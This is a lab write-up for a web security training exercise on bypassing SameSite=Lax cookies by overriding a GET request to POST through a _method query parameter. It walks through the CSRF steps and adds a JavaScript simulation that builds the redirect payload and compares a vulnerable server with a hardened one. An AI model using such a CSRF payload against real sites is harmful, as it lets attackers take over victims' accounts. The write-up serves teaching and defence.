LAB 7 - SameSite Lax bypass via method override
Initial instructions
This lab's change email function is vulnerable to CSRF. To solve the lab, perform a CSRF attack that changes the victim's email address. You should use the provided exploit server to host your attack.
You can log in to your own account using the following credentials: wiener:peter
First, log in with the wiener credentials, submit a change to the account's email address and intercept the request in Burp Suite.
The request carries no CSRF token at all; the session cookie is the only thing tying it to the user. The browser treats that cookie as SameSite=Lax, which withholds it from cross-site POST requests but still sends it on cross-site top-level GET navigations, so the question is whether the server will accept the state change over GET.

Next, change the request method to GET and add _method=POST to the query string so that the server rewrites the GET into a POST before handling it.
Sending the modified request succeeds and the email is changed, which confirms the method override works and means a cross-site top-level GET navigation will be accepted as the state-changing POST.

From the modified request, generate a CSRF PoC in Burp and host it on the exploit server. Because the request is now a GET, the PoC only needs to navigate the victim's browser to the change-email URL with the email and _method=POST parameters in the query string.
This is my CSRF PoC.

Store the PoC on the exploit server and deliver it to the victim. (Remember to change the email parameter in the PoC first, since it was generated from a request that already set your own address.)
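As an added example, not the lab's or PortSwigger's code: the JavaScript below models the two facts the bypass rests on, a SameSite=Lax cookie being sent on cross-site top-level GET navigations but not on cross-site POSTs, and a backend that rewrites the request method from the _method query parameter. It then runs the exploit-server page against a vulnerable dispatcher and against a hardened one that only honours _method on a genuine POST. The lab hostname YOUR-LAB-ID.web-security-academy.net, the attacker email, the in-memory session and the handler are assumptions for illustration.

```javascript
// Added example, not the lab's or PortSwigger's code. It models the two facts
// the bypass relies on (SameSite=Lax sends the cookie on cross-site top-level
// GET navigations; the backend rewrites the method from `_method`) and runs the
// attack against a vulnerable and a hardened dispatcher. The hostnames, the
// in-memory session and the handler are assumptions for illustration only.

// Lax rule: a cross-site request carries the cookie only when it is a
// top-level GET navigation; a cross-site POST never does.
function laxCookieSent(req) {
  if (req.sameSite) return true;
  return req.method === "GET" && req.topLevel;
}

// Vulnerable dispatcher (what the lab backend does): any request can change
// its verb through the `_method` query parameter.
function effectiveMethodVulnerable(req) {
  const override = new URL(req.url).searchParams.get("_method");
  return override ? override.toUpperCase() : req.method;
}

// Hardened dispatcher: honour `_method` only on a genuine POST (the
// Rack::MethodOverride convention), so a GET navigation can never be promoted
// to a state-changing POST. A cross-site POST has no Lax cookie, so the
// override is now only reachable from same-site pages.
function effectiveMethodHardened(req) {
  const override = new URL(req.url).searchParams.get("_method");
  return req.method === "POST" && override ? override.toUpperCase() : req.method;
}

// Parameters may arrive in the query string (the attack) or a form body
// (the legitimate request); merge both like a typical framework does.
function paramsOf(req) {
  const merged = new URLSearchParams(req.body || "");
  for (const [k, v] of new URL(req.url).searchParams) merged.set(k, v);
  return merged;
}

// Minimal /my-account/change-email: needs the session cookie and a POST.
function handleChangeEmail(req, resolveMethod, session) {
  if (!laxCookieSent(req)) return { status: 401, email: session.email };
  if (resolveMethod(req) !== "POST") return { status: 405, email: session.email };
  session.email = paramsOf(req).get("email");
  return { status: 302, email: session.email };
}

// The exploit-server page: a top-level navigation to the overridden URL.
function buildCsrfPoc(labHost, attackerEmail) {
  const url =
    `https://${labHost}/my-account/change-email` +
    `?email=${encodeURIComponent(attackerEmail)}&_method=POST`;
  const html = `<script>document.location = ${JSON.stringify(url)};</script>`;
  return { url, html };
}

// Deliver the PoC to a logged-in victim and report what the account ends up with.
function runAttack(resolveMethod) {
  const session = { email: "wiener@normal-user.net" }; // constructed victim session
  const poc = buildCsrfPoc("YOUR-LAB-ID.web-security-academy.net", "pwned@exploit-server.net");
  const victimNav = { method: "GET", url: poc.url, topLevel: true, sameSite: false };
  return handleChangeEmail(victimNav, resolveMethod, session);
}

// Sanity check: the legitimate same-site POST works under both dispatchers.
function legitimateChange(resolveMethod) {
  const session = { email: "wiener@normal-user.net" };
  const req = {
    method: "POST",
    url: "https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email",
    body: "email=new@normal-user.net",
    topLevel: true,
    sameSite: true,
  };
  return handleChangeEmail(req, resolveMethod, session);
}
```

Run it with node: runAttack(effectiveMethodVulnerable) returns status 302 with the attacker's email in the session, while runAttack(effectiveMethodHardened) returns 405 and leaves the account untouched, and legitimateChange succeeds under both. The hardening shown is only one of the possible fixes; a per-session CSRF token on the form, or setting the cookie to SameSite=Strict, would also close the hole.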
